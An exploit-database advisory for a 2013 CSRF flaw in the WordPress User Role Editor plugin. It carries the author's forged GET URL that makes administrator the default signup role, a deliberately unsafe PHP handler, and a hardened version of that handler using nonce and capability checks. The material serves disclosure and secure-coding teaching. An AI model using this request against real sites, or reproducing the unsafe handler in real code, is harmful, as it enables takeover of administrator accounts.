Vendor: User Role Editor
Author: Henry Hoggard
CVSS: 5.5 (MEDIUM)
CWE: 352 Cross-Site Request Forgery (CSRF)
Product Name: User Role Editor
Affected Version From: <=3.12
Affected Version To: 3.12
Patch Exists: YES
Related CWE:
CPE: a:wordpress:user_role_editor
Metasploit:
Other Scripts:
Platforms Tested: Debian
Year: 2013

WP User Role Editor CSRF

The plugin's admin page acts on a plain GET request without a nonce, so an attacker who lures a logged-in administrator to a page carrying the forged request can change the default role for new registrations to administrator, and can then sign up with admin privileges.

Mitigation:

Update to version 3.14 or higher

Exploit-DB raw data:

# Exploit Title: WP User Role Editor CSRF
# Date: 19/5/13
# Exploit Author: Henry Hoggard
# Author Website: http://henryhoggard.co.uk
# Vendor Homepage: https://wordpress.org/support/plugin/user-role-editor
# Software Link: https://wordpress.org/support/plugin/user-role-editor
# Version: <=3.12
# Tested on: Debian
# CVE : none yet

Notified Dev: 16/05/13
Patch Released (3.14): 17/05/13

Description:
This allows you to sign up with admin privileges if you make the admin visit your CSRF script.

http://server/wordpress/wp-admin/users.php?page=user-role-editor.php&action=default&user_role=administrator
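The request above succeeds because the handler trusts any GET that arrives with the administrator's session cookie. The following is an added illustration of the fix, not the User Role Editor plugin's own source: a hypothetical handler written first in the unsafe pattern and then hardened with the standard WordPress defences (a per-user, per-action nonce via check_admin_referer(), a capability check, and validation of the submitted role). The function names prefixed ure_example_, the nonce action string and the use of the default_role option are assumptions made for the example.

```php
<?php
// Added example (not the plugin's code): a hypothetical WordPress admin-page
// handler that changes the default role for new registrations, shown in the
// unsafe pattern and then in a hardened form. Names prefixed ure_example_ and
// the nonce action string are assumptions made for this illustration.

// UNSAFE PATTERN (for comparison). Any GET reaching this page while the
// browser sends an administrator's session cookie changes the option, so a
// link embedded in a third-party page is enough to trigger it.
function ure_example_unsafe_handler() {
    if ( isset( $_GET['action'] ) && 'default' === $_GET['action'] && isset( $_GET['user_role'] ) ) {
        update_option( 'default_role', $_GET['user_role'] ); // no nonce, no capability check, no validation
    }
}

// HARDENED PATTERN.
function ure_example_safe_handler() {
    if ( ! isset( $_GET['action'] ) || 'default' !== $_GET['action'] ) {
        return;
    }

    // 1. Authorization: only users allowed to manage site options may proceed.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }

    // 2. CSRF defence: check_admin_referer() verifies the _wpnonce parameter
    //    against a token bound to the current user and this action name and
    //    dies on failure. A third-party page cannot know that token, so a
    //    forged request is rejected even though the session cookie is present.
    check_admin_referer( 'ure_example_set_default_role' );

    // 3. Input validation: accept only a role this site actually defines, and
    //    refuse to make a privileged role the default for self-registration.
    $role  = isset( $_GET['user_role'] ) ? sanitize_key( $_GET['user_role'] ) : '';
    $roles = wp_roles()->get_names(); // slug => display name
    if ( ! array_key_exists( $role, $roles ) ) {
        wp_die( 'Unknown role.' );
    }
    if ( 'administrator' === $role ) {
        wp_die( 'Refusing to make administrator the default role.' );
    }

    update_option( 'default_role', $role );
}

// Every legitimate link to the action must carry the matching nonce.
// wp_nonce_url() appends _wpnonce for the current user and this action name,
// so the plugin's own UI keeps working while forged links fail the check.
function ure_example_action_link( $role ) {
    $url = admin_url( 'users.php?page=user-role-editor.php&action=default&user_role=' . rawurlencode( $role ) );
    return wp_nonce_url( $url, 'ure_example_set_default_role' );
}
```

The nonce is the part that actually closes the CSRF hole; the capability check and role validation are defence in depth. State-changing actions are also better carried by POST from a form that includes wp_nonce_field(), since that keeps the action out of browser history and referer headers, but moving to POST alone does not stop a forged form submission without the nonce check.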